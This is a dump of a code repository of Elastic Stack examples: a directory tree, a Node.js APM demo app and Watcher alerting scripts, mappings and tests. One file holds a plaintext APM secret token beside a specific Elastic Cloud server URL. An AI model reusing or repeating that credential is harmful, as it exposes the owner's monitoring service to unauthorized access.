    │   │           │   ├── server.log.2016-12-19-18
    │   │           │   ├── server.log.2016-12-19-19
    │   │           │   ├── server.log.2016-12-19-20
    │   │           │   ├── server.log.2016-12-19-21
    │   │           │   ├── server.log.2016-12-19-22
    │   │           │   ├── server.log.2016-12-19-23
    │   │           │   ├── state-change.log
    │   │           │   ├── state-change.log.2016-12-19-16
    │   │           │   └── state-change.log.2016-12-19-18
    │   │       ├── kafka1
    │   │           └── logs
    │   │           │   ├── controller.log
    │   │           │   ├── controller.log.2016-12-19-16
    │   │           │   ├── controller.log.2016-12-19-18
    │   │           │   ├── kafka-authorizer.log
    │   │           │   ├── kafka-request.log
    │   │           │   ├── kafkaServer-gc.log
    │   │           │   ├── log-cleaner.log
    │   │           │   ├── log-cleaner.log.2016-12-19-16
    │   │           │   ├── log-cleaner.log.2016-12-19-18
    │   │           │   ├── server.log
    │   │           │   ├── server.log.2016-12-19-16
    │   │           │   ├── server.log.2016-12-19-17
    │   │           │   ├── server.log.2016-12-19-18
    │   │           │   ├── server.log.2016-12-19-19
    │   │           │   ├── server.log.2016-12-19-20
    │   │           │   ├── server.log.2016-12-19-21
    │   │           │   ├── server.log.2016-12-19-22
    │   │           │   ├── server.log.2016-12-19-23
    │   │           │   ├── state-change.log
    │   │           │   ├── state-change.log.2016-12-19-16
    │   │           │   ├── state-change.log.2016-12-19-18
    │   │           │   └── state-change.log.2016-12-19-19
    │   │       └── kafka2
    │   │           └── logs
    │   │               ├── controller.log
    │   │               ├── controller.log.2016-12-19-16
    │   │               ├── kafka-authorizer.log
    │   │               ├── kafka-request.log
    │   │               ├── kafkaServer-gc.log
    │   │               ├── log-cleaner.log
    │   │               ├── log-cleaner.log.2016-12-19-16
    │   │               ├── server.log
    │   │               ├── server.log.2016-12-19-16
    │   │               ├── server.log.2016-12-19-17
    │   │               ├── server.log.2016-12-19-18
    │   │               ├── server.log.2016-12-19-19
    │   │               ├── server.log.2016-12-19-20
    │   │               ├── server.log.2016-12-19-21
    │   │               ├── server.log.2016-12-19-22
    │   │               ├── server.log.2016-12-19-23
    │   │               ├── state-change.log
    │   │               ├── state-change.log.2016-12-19-16
    │   │               ├── state-change.log.2016-12-19-18
    │   │               └── state-change.log.2016-12-19-19
    ├── kafka_monitoring_with_beats_modules
    │   ├── README.md
    │   ├── Vagrantfile
    │   ├── provisioner.sh
    │   └── run-kafka.sh
    └── kibana_geoserver
    │   ├── Dockerfile
    │   └── README.md
├── MonitoringEKS
    ├── README.md
    ├── beats
    │   ├── filebeat-kubernetes.yaml
    │   └── metricbeat-kubernetes.yaml
    ├── config
    │   └── metricbeat-iam-policy.json
    ├── images
    │   ├── k8s-overview.png
    │   ├── k8s.png
    │   ├── logs-app.png
    │   └── metrics-app.png
    └── secrets
    │   ├── CREDS
    │       ├── AWS_ACCESS_KEY_ID
    │       ├── AWS_ACCESS_KEY_SECRET
    │       ├── ELASTIC_CLOUD_AUTH
    │       └── ELASTIC_CLOUD_ID
    │   ├── generate-secrets-manifest.sh
    │   └── secrets-example.yaml
├── MonitoringKubernetes
    ├── CLOUD_ID
    ├── DockerDashboard.png
    ├── ELASTIC_PASSWORD
    ├── README.md
    ├── download.txt
    ├── elasticsearch.yaml
    ├── filebeat-kubernetes.yaml
    ├── guestbook.yaml
    ├── metricbeat-kubernetes.yaml
    ├── packetbeat-kubernetes.yaml
    ├── scaling-discover.png
    └── watch.txt
├── README.md
├── Reference
    └── Beats
    │   ├── README.md
    │   ├── filebeat.example.yml
    │   ├── heartbeat.example.yml
    │   └── metricbeat.example.yml
├── Search
    ├── recipe_search_java
    │   ├── README.md
    │   ├── data
    │   │   ├── banana-oatmeal-cookie.json
    │   │   ├── basil-and-pesto-hummus.json
    │   │   ├── black-bean-and-rice-enchiladas.json
    │   │   ├── divine-hard-boiled-eggs.json
    │   │   ├── four-cheese-margherita-pizza.json
    │   │   ├── homemade-black-bean-veggie-burgers.json
    │   │   ├── homemade-chicken-enchiladas.json
    │   │   ├── marinated-grilled-shrimp.json
    │   │   ├── vegetable-fried-rice.json
    │   │   ├── vegetarian-korma.json
    │   │   └── worlds-best-lasagna.json
    │   ├── pom.xml
    │   ├── recipes.iml
    │   ├── src
    │   │   └── main
    │   │   │   ├── java
    │   │   │       └── com
    │   │   │       │   └── elastic
    │   │   │       │       └── recipe
    │   │   │       │           ├── IndexRecipesApp.java
    │   │   │       │           ├── SearchRecipesApp.java
    │   │   │       │           └── SearchRecipesServlet.java
    │   │   │   └── webapp
    │   │   │       ├── WEB-INF
    │   │   │           └── web.xml
    │   │   │       ├── css
    │   │   │           ├── bootstrap-table.css
    │   │   │           ├── bootstrap-table.min.css
    │   │   │           ├── bootstrap-theme.css
    │   │   │           ├── bootstrap-theme.css.map
    │   │   │           ├── bootstrap-theme.min.css
    │   │   │           ├── bootstrap-theme.min.css.map
    │   │   │           ├── bootstrap.css
    │   │   │           ├── bootstrap.css.map
    │   │   │           ├── bootstrap.min.css
    │   │   │           ├── bootstrap.min.css.map
    │   │   │           ├── index.css
    │   │   │           └── recipes.css
    │   │   │       ├── fonts
    │   │   │           ├── glyphicons-halflings-regular.eot
    │   │   │           ├── glyphicons-halflings-regular.svg
    │   │   │           ├── glyphicons-halflings-regular.ttf
    │   │   │           ├── glyphicons-halflings-regular.woff
    │   │   │           └── glyphicons-halflings-regular.woff2
    │   │   │       ├── js
    │   │   │           ├── boostrap-table-editable.js
    │   │   │           ├── bootstrap-editable.js
    │   │   │           ├── bootstrap-table-editable.js
    │   │   │           ├── bootstrap-table-export.js
    │   │   │           ├── bootstrap-table-zh-CN.min.js
    │   │   │           ├── bootstrap-table.js
    │   │   │           ├── bootstrap-table.min.js
    │   │   │           ├── bootstrap.js
    │   │   │           ├── bootstrap.min.js
    │   │   │           ├── npm.js
    │   │   │           └── tableExport.js
    │   │   │       └── recipes.html
    │   └── target
    │   │   └── classes
    │   │       └── com
    │   │           └── elastic
    │   │               └── recipe
    │   │                   ├── IndexRecipesApp.class
    │   │                   ├── SearchRecipesApp.class
    │   │                   └── SearchRecipesServlet.class
    └── recipe_search_php
    │   ├── .gitignore
    │   ├── README.md
    │   ├── composer.json
    │   ├── data
    │       ├── recipes
    │       │   ├── banana-oatmeal-cookie.json
    │       │   ├── basil-and-pesto-hummus.json
    │       │   ├── black-bean-and-rice-enchiladas.json
    │       │   ├── divine-hard-boiled-eggs.json
    │       │   ├── four-cheese-margherita-pizza.json
    │       │   ├── homemade-black-bean-veggie-burgers.json
    │       │   ├── homemade-chicken-enchiladas.json
    │       │   ├── marinated-grilled-shrimp.json
    │       │   ├── vegetable-fried-rice.json
    │       │   ├── vegetarian-korma.json
    │       │   └── worlds-best-lasagna.json
    │       └── seed.php
    │   ├── public
    │       ├── add.php
    │       ├── advanced.php
    │       ├── css
    │       │   └── bootstrap.min.css
    │       ├── index.php
    │       ├── js
    │       │   ├── jquery.min.js
    │       │   └── script.js
    │       ├── results.php
    │       ├── simple.php
    │       └── view.php
    │   └── src
    │       └── RecipeSearch
    │           ├── Constants.php
    │           └── Util.php
├── Security Analytics
    ├── ACSC2020-008_IOCs
    │   ├── README.md
    │   ├── acsc-2020-008-IOCs.ndjson
    │   └── images
    │   │   └── siem-rules.png
    ├── SIEM-at-Home
    │   ├── README.md
    │   └── beats-configs
    │   │   ├── beats-general-config.yml
    │   │   ├── beats-on-centos
    │   │       ├── auditbeat.yml
    │   │       ├── filebeat.yml
    │   │       └── packetbeat.yml
    │   │   ├── beats-on-macOS
    │   │       ├── auditbeat.yml
    │   │       └── packetbeat.yml
    │   │   ├── beats-on-windows
    │   │       ├── auditbeat.yml
    │   │       ├── packetbeat.yml
    │   │       └── winlogbeat.yml
    │   │   ├── filebeat
    │   │       └── filebeat-syslog-input.yml
    │   │   └── packetbeat
    │   │       └── packetbeat.yml
    ├── SIEM-examples
    │   ├── Detections-API
    │   │   └── Kibana.postman_collection.v2.json
    │   ├── Packetbeat
    │   │   └── geoip-info.json
    │   └── README.md
    ├── auditd_analysis
    │   ├── README.md
    │   ├── auditd_analysis_logstash.conf
    │   ├── example_1
    │   │   ├── README.md
    │   │   ├── auditd.cef
    │   │   ├── auditd_analysis_kibana.json
    │   │   ├── new_process.inline.json
    │   │   └── new_process.json
    │   ├── example_2
    │   │   ├── README.md
    │   │   ├── auditd.cef.tar.gz
    │   │   ├── data_feed.json
    │   │   ├── job.json
    │   │   ├── reset_job.sh
    │   │   ├── unusual_process.inline.json
    │   │   └── unusual_process.json
    │   ├── requirements.txt
    │   └── simulate_watch.py
    ├── cef_with_kafka
    │   ├── README.md
    │   ├── docker-compose.yml
    │   ├── kafka
    │   │   ├── Dockerfile
    │   │   ├── broker-list.sh
    │   │   ├── create-topics.sh
    │   │   ├── download-kafka.sh
    │   │   ├── start-kafka-shell.sh
    │   │   └── start-kafka.sh
    │   └── logstash
    │   │   ├── Dockerfile
    │   │   └── config
    │   │       └── logstash.yml
    ├── cef_with_logstash
    │   ├── docker-compose.yml
    │   └── logstash
    │   │   ├── Dockerfile
    │   │   └── config
    │   │       └── logstash.yml
    ├── dns_tunnel_detection
    │   ├── .gitignore
    │   ├── README.md
    │   ├── dns-tunnel-iodine.pcap
    │   ├── dns_transform.painless
    │   ├── packetbeat-dns.template.json
    │   ├── packetbeat.yml
    │   └── unique_hostnames_watch.json
    ├── malware_analysis
    │   ├── README.md
    │   ├── images
    │   │   └── kibana.png
    │   ├── packetbeat.yml
    │   ├── sysmonconfig.xml
    │   └── winlogbeat.yml
    └── ssh_analysis
    │   ├── README.md
    │   ├── brute_force_login.inline.json
    │   ├── brute_force_login.json
    │   ├── run_watch.sh
    │   ├── ssh_analysis_kibana.json
    │   ├── ssh_analysis_logstash.conf
    │   ├── successful_login_external.inline.json
    │   └── successful_login_external.json
├── Speed Layer
    ├── README.md
    ├── dev_console.json
    ├── kibana_objects.ndjson
    └── logstash_batch_export.conf
├── beats-k8s-send-anywhere
    ├── DockerDashboard.png
    ├── ELASTICSEARCH_HOSTS
    ├── ELASTICSEARCH_PASSWORD
    ├── ELASTICSEARCH_USERNAME
    ├── ELASTIC_CLOUD_AUTH
    ├── ELASTIC_CLOUD_ID
    ├── KIBANA_HOST
    ├── README-Cloud.md
    ├── README-Main.md
    ├── README-Self-Managed.md
    ├── README.md
    ├── filebeat-kubernetes.yaml
    ├── guestbook.yaml
    ├── metricbeat-kubernetes.yaml
    ├── packetbeat-kubernetes.yaml
    ├── scaling-discover.png
    └── scaling-up.png
├── blog
    ├── README.MD
    ├── climbing-the-pyramid-with-celestial-themed-malware
    │   ├── README.MD
    │   └── windows_trojan_deimos.yar
    ├── mozin-about
    │   ├── README.MD
    │   ├── collection.sh
    │   ├── index-settings.json
    │   ├── ingest-node-pipeline.json
    │   └── mozi-obfuscation-technique.yara
    └── reverse-geocoding
    │   └── csba.json
├── canvas
    ├── ama
    │   ├── README.md
    │   ├── ama-responses.bulk
    │   ├── canvas-workpad-ama-responses-alt.json
    │   ├── canvas-workpad-ama-responses.json
    │   └── images
    │   │   ├── existing-workpads.png
    │   │   └── no-workpads.png
    └── elasticoffee
    │   ├── README.md
    │   ├── canvas-workpad-CafeCanvas.json
    │   ├── elasticoffee-data.bulk
    │   ├── elasticon-home-assistant
    │       ├── automations
    │       │   └── elasticon-automations.yaml
    │       ├── coffeePressHandler.sh
    │       ├── configuration.yaml
    │       ├── customize.yaml
    │       ├── groups.yaml
    │       ├── load-test.sh
    │       ├── options.xml
    │       ├── scripts.yaml
    │       ├── shell_commands
    │       │   └── elasticon-shell_commands.yaml
    │       ├── zwcfg_0xf7001e9d.xml
    │       └── zwscene.xml
    │   └── images
    │       ├── existing-workpads.png
    │       └── no-workpads.png
├── k8s-observability-with-eck
    ├── ECK-obs-infrastructure.png
    ├── ELASTICSEARCH_HOSTS
    ├── ELASTICSEARCH_PASSWORD
    ├── ELASTICSEARCH_USERNAME
    ├── KIBANA_HOST
    ├── README.md
    ├── cert.yaml
    ├── filebeat-kubernetes.yaml
    ├── guestbook.yaml
    ├── heartbeat-kubernetes.yaml
    └── metricbeat-kubernetes.yaml
└── scraping-prometheus-k8s-with-metricbeat
    ├── CLOUD_ID
    ├── ELASTIC_PASSWORD
    ├── README.md
    ├── download.txt
    ├── guestbook.yaml
    ├── images
        ├── 001-kibana.png
        ├── 002-kibana.png
        ├── 003-kibana.png
        ├── 004-kibana.png
        ├── 005-kibana.png
        ├── 006-kibana.png
        ├── 007-kibana.png
        ├── 008-kibana.png
        ├── 009-kibana.png
        ├── 010-kibana.png
        ├── 011-kibana.png
        ├── 012-kibana.png
        ├── 013-kibana.png
        ├── 014-kibana.png
        ├── 015-kibana.png
        ├── 016-kibana.png
        ├── 017-kibana.png
        ├── 018-kibana.png
        ├── 019-kibana.png
        ├── 020-kibana.png
        ├── annotations.png
        ├── kube-state-metrics.png
        ├── metricbeat-autodiscover-exporters.png
        ├── metricbeat-prometheus-server.png
        ├── prometheus-autodiscover-snippet.png
        ├── prometheus-federate.png
        ├── prometheus-selfmon.png
        └── sidecar.png
    ├── metricbeat-clusterrolebinding.yaml
    ├── metricbeat-kube-state-and-prometheus-server.yaml
    └── metricbeat-prometheus-auto-discover.yaml


/.gitattributes:
--------------------------------------------------------------------------------
1 | # Force all checkouts to convert to LF line endings
2 | # Treat these file types as binary
3 | *.pcap     binary
4 | 


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/.dockerignore:
--------------------------------------------------------------------------------
1 | node-express.yaml
2 | node_modules
3 | npm-debug.log
4 | .gitignore
5 | 


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/.gitignore:
--------------------------------------------------------------------------------
1 | node_modules
2 | npm-debug.log
3 | 


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:13.7
 2 | 
 3 | # Create app directory
 4 | WORKDIR /usr/src/app
 5 | 
 6 | # Install app dependencies
 7 | # A wildcard is used to ensure both package.json AND package-lock.json are copied
 8 | # where available (npm@5+)
 9 | COPY package*.json ./
10 | 
11 | RUN npm install
12 | # If you are building your code for production
13 | # RUN npm ci --only=production
14 | 
15 | # Bundle app source
16 | COPY . .
17 | 
18 | EXPOSE 8080
19 | CMD [ "node", "server.js" ]
20 | 


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/ELASTIC_APM_SECRET_TOKEN:
--------------------------------------------------------------------------------
1 | jbFLkVXglRlFWzrxaf


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/ELASTIC_APM_SERVER_URL:
--------------------------------------------------------------------------------
1 | https://c2198b9a492d42a1b4faab380227701f.apm.us-east4.gcp.elastic-cloud.com:443


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/ELASTIC_APM_SERVICE_NAME:
--------------------------------------------------------------------------------
1 | node-example


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/images/APM-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/APM/Node.js/Kubernetes/images/APM-1.png


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/images/APM-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/APM/Node.js/Kubernetes/images/APM-2.png


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/images/APM-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/APM/Node.js/Kubernetes/images/APM-3.png


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/images/APM-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/APM/Node.js/Kubernetes/images/APM-4.png


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/images/APM-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/APM/Node.js/Kubernetes/images/APM-5.png


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/images/Node-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/APM/Node.js/Kubernetes/images/Node-1.png


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/images/Node-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/APM/Node.js/Kubernetes/images/Node-2.png


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/namespace.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | apiVersion: v1
3 | kind: Namespace
4 | metadata:
5 |   name: express-demo
6 | 


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "docker_web_app",
 3 |   "version": "1.0.0",
 4 |   "description": "Node.js on Docker",
 5 |   "author": "Dan Roscigno <dan.roscigno@elastic.co>",
 6 |   "main": "server.js",
 7 |   "scripts": {
 8 |     "start": "node server.js"
 9 |   },
10 |   "dependencies": {
11 |     "elastic-apm-node": "^3.3.0",
12 |     "express": "^4.16.1"
13 |   }
14 | }
15 | 


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/server.js:
--------------------------------------------------------------------------------
 1 | const apm = require('elastic-apm-node').start()
 2 | 
 3 | 'use strict';
 4 | 
 5 | const express = require('express');
 6 | 
 7 | // Constants
 8 | const PORT = 8080;
 9 | const HOST = '0.0.0.0';
10 | 
11 | // App
12 | const app = express();
13 | app.get('/', (req, res) => {
14 |   res.send('Hello World');
15 | });
16 | 
17 | app.listen(PORT, HOST);
18 | console.log(`Running on http://${HOST}:${PORT}`);
19 | 
20 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/.gitignore:
--------------------------------------------------------------------------------
 1 | todo
 2 | dist*
 3 | *.venv
 4 | *.idea
 5 | *.gz
 6 | *.log
 7 | *.local
 8 | /dist/
 9 | /build/
10 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/cpu_iowait_hosts/scripts/calculate_iowait.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "(doc['system.cpu.iowait.pct'].value\/(doc['system.cpu.user.pct'].value + doc['system.cpu.nice.pct'].value + doc['system.cpu.system.pct'].value + doc['system.cpu.idle.pct'].value + doc['system.cpu.iowait.pct'].value + doc['system.cpu.irq.pct'].value + doc['system.cpu.softirq.pct'].value + doc['system.cpu.steal.pct'].value))*100"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/cpu_iowait_hosts/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def threshold=ctx.metadata.threshold; def hosts = ctx.payload.aggregations.per_host.buckets; if (hosts.size() == 0) return false; return hosts.stream().anyMatch(p -> p.per_minute.buckets[p.per_minute.buckets.length - 1].iowait_deriv.value > threshold);"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/cpu_iowait_hosts/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def threshold=ctx.metadata.threshold; def hosts = ctx.payload.aggregations.per_host.buckets; return hosts.stream().filter(p -> p.per_minute.buckets[p.per_minute.buckets.length - 1].iowait_deriv.value > threshold).map(e -> ['key': e.key, 'value': e.per_minute.buckets[e.per_minute.buckets.length - 1].iowait_deriv.value]).collect(Collectors.toList());"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/errors_in_logs/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "@timestamp": {
 5 |           "type": "date",
 6 |           "format": "strict_date_optional_time||epoch_millis"
 7 |         },
 8 |         "message": {
 9 |           "type": "text"
10 |         },
11 |         "loglevel":{
12 |           "type": "keyword"
13 |         }
14 |       }
15 |   }
16 | }
17 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/filesystem_usage/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "hostname":{
 5 |           "type": "keyword"
 6 |         },
 7 |         "used_p":{
 8 |           "type": "double"
 9 |         },
10 |         "@timestamp":{
11 |           "type":"date"
12 |         }
13 |       }
14 |   }
15 | }
16 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/filesystem_usage/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def threshold_p = ctx.metadata.threshold*100; return [ 'threshold': (int)threshold_p, 'hosts': ctx.payload.aggregations.host.buckets.stream().map(p -> [ 'key': p.key, 'disk_usage': (int) (p.disk_usage.value*100)]).collect(Collectors.toList()) ];"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/filesystem_usage/tests/test1.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "watch_name":"filesystem_usage",
 3 |   "mapping_file":"./filesystem_usage/mapping.json",
 4 |   "index":"logs",
 5 |   "type":"filesystem",
 6 |   "watch_file":"./filesystem_usage/watch.json",
 7 |   "comments":"Tests filesystem being above 0.9. Server 1 & 4 should alert as within 60 seconds. Server 2 should not (10 mins). 3rd server should not alert as < 0.9.",
 8 |   "scripts":[{"name":"transform","path":"./filesystem_usage/scripts/transform.json"}],
 9 |   "events":[
10 |   {
11 |     "hostname": "test_server1",
12 |     "used_p": 0.99,
13 |     "offset":"-60"
14 |   },
15 |   {
16 |     "hostname": "test_server2",
17 |     "used_p": 0.98,
18 |     "offset":"-600"
19 |   },
20 |   {
21 |     "hostname": "test_server3",
22 |     "used_p": 0.89,
23 |     "offset":"-60"
24 |   },
25 |   {
26 |     "hostname": "test_server4",
27 |     "used_p": 0.95
28 |   }
29 |   ],
30 |   "expected_response":"Some hosts are over 90% utilized:99%-test_server1:95%-test_server4:"
31 | }
32 | 
33 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/large_shard_watch/README.md:
--------------------------------------------------------------------------------
 1 | # Monitoring for Large Shards
 2 | 
 3 | ## Description
 4 | 
 5 | This is a watch that creates a helper index (large_shards), and it uses it to alert one time (per shard) based off the size of the shards defined in the metadata.
 6 | 
 7 | It queries the cat/shards api call to get the information first, and then ingests it into large-shards
 8 | 
 9 | 
10 | # Configuration
11 | 
12 | * Metadata is where the threshold_in_bytes is set.
13 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/lateral_movement_in_user_comm/ingest.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "extracts time field required  lateral_movement_in_user_comm watch",
 3 |   "processors": [
 4 |     {
 5 |       "grok": {
 6 |         "field": "@timestamp",
 7 |         "patterns": [
 8 |           "%{YEAR}-%{MONTHNUM}-%{MONTHDAY}T%{TIME:time}"
 9 |         ],
10 |         "pattern_definitions": {
11 |           "TIME": "%{ISO8601_HOUR}:%{MINUTE}:([0-5]?[0-9]|60)"
12 |         }
13 |       }
14 |     }
15 |   ]
16 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/lateral_movement_in_user_comm/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "user_server": {
 5 |           "type": "keyword"
 6 |         },
 7 |         "@timestamp": {
 8 |           "type": "date",
 9 |           "format": "strict_date_optional_time"
10 |         },
11 |         "time": {
12 |           "type": "date",
13 |           "format": "HH:mm:ss||strict_time_no_millis"
14 |         }
15 |       }
16 |   }
17 | }
18 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/lateral_movement_in_user_comm/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "return ctx.payload.user_server_logons.aggregations.user_server.buckets.size() != ctx.payload.new_user_server_logons.aggregations.user_server.buckets.size();"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/lateral_movement_in_user_comm/scripts/lower_time.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "return LocalDateTime.parse(params.current_time.substring(0,19)).minusMinutes(30).format(DateTimeFormatter.ofPattern('HH:mm:ss'))+'Z';"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/lateral_movement_in_user_comm/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def history = ctx.payload.new_user_server_logons.aggregations.user_server.buckets.stream().map(p -> p.key).collect(Collectors.toList()); def response=[:]; response['lower_time']=ctx.payload.get_time_period.hits.hits[0].fields.lower_time[0]; response['upper_time']=ctx.payload.get_time_period.hits.hits[0].fields.upper_time[0]; response['new_starts']=ctx.payload.user_server_logons.aggregations.user_server.buckets.stream().map(p -> p.key).filter(p -> !history.contains(p)).map(p -> p.replace('_',' on server ')).collect(Collectors.toList());  return response;"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/lateral_movement_in_user_comm/scripts/upper_time.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "return LocalDateTime.parse(params.current_time.substring(0,19)).plusMinutes(30).format(DateTimeFormatter.ofPattern('HH:mm:ss'))+'Z';"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/monitoring_cluster_health/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "date_detection": false,
 4 |       "properties": {
 5 |         "cluster_state": {
 6 |           "properties": {
 7 |             "master_node": {
 8 |               "type": "keyword"
 9 |             },
10 |             "nodes": {
11 |               "type": "object",
12 |               "enabled": false
13 |             },
14 |             "shards": {
15 |               "type": "object"
16 |             },
17 |             "state_uuid": {
18 |               "type": "keyword"
19 |             },
20 |             "status": {
21 |               "type": "keyword"
22 |             },
23 |             "version": {
24 |               "type": "long"
25 |             }
26 |           }
27 |         },
28 |         "cluster_uuid": {
29 |           "type": "keyword"
30 |         },
31 |         "timestamp": {
32 |           "type": "date",
33 |           "format": "date_time"
34 |         },
35 |         "type": {
36 |           "type": "keyword"
37 |         }
38 |       }
39 |   }
40 | }
41 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/monitoring_cluster_health/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def is_not_green=ctx.payload.aggregations.clusters.buckets.stream().anyMatch(t -> (t.latest_state.hits.hits[0]._source.cluster_state.status== 'yellow' || t.latest_state.hits.hits[0]._source.cluster_state.status == 'red')); if (is_not_green) { def required_periods = (ctx.metadata.not_green_secs-ctx.metadata.monitoring_update_interval)/ctx.metadata.monitoring_update_interval; return ctx.payload.aggregations.clusters.buckets.stream().anyMatch(t -> ((t.cluster_state.buckets.red.doc_count + t.cluster_state.buckets.yellow.doc_count) >= required_periods ));}  return false;"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/monitoring_cluster_health/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def required_periods = (ctx.metadata.not_green_secs-ctx.metadata.monitoring_update_interval)/ctx.metadata.monitoring_update_interval; return ctx.payload.aggregations.clusters.buckets.stream().filter(t -> (t.latest_state.hits.hits[0]._source.cluster_state.status == 'yellow' || t.latest_state.hits.hits[0]._source.cluster_state.status == 'red')).filter(t -> (t.cluster_state.buckets.red.doc_count + t.cluster_state.buckets.yellow.doc_count) >= required_periods).map(t -> ['cluster_id':t.key,'cluster_state':t.latest_state.hits.hits[0]._source.cluster_state.status]).collect(Collectors.toList());"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/monitoring_free_disk_space/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "return ctx.payload.aggregations.nodes.buckets.stream().anyMatch(it -> it.free_ratio.value < ctx.metadata.lower_bound);"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/monitoring_free_disk_space/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "ctx.payload.aggregations.nodes.buckets.stream().filter(it -> it.free_ratio.value < ctx.metadata.lower_bound).map(it -> ['node_name':it.key,'available_in_gb':Math.round((it.available_in_bytes.value/1073741824) * 100)/100,'total_in_gb':Math.round((it.total_in_bytes.value/1073741824)* 100)/100]).collect(Collectors.toList());"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/new_process_started/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "@timestamp": {
 5 |           "type": "date"
 6 |         },
 7 |         "process_host": {
 8 |           "type": "keyword"
 9 |         },
10 |         "event_type": {
11 |           "type": "keyword"
12 |         }
13 |       }
14 |   }
15 | }
16 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/new_process_started/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "return ctx.payload.started_processes.aggregations.process_hosts.buckets.size() != ctx.payload.history_started_processes.aggregations.process_hosts.buckets.size();"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/new_process_started/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
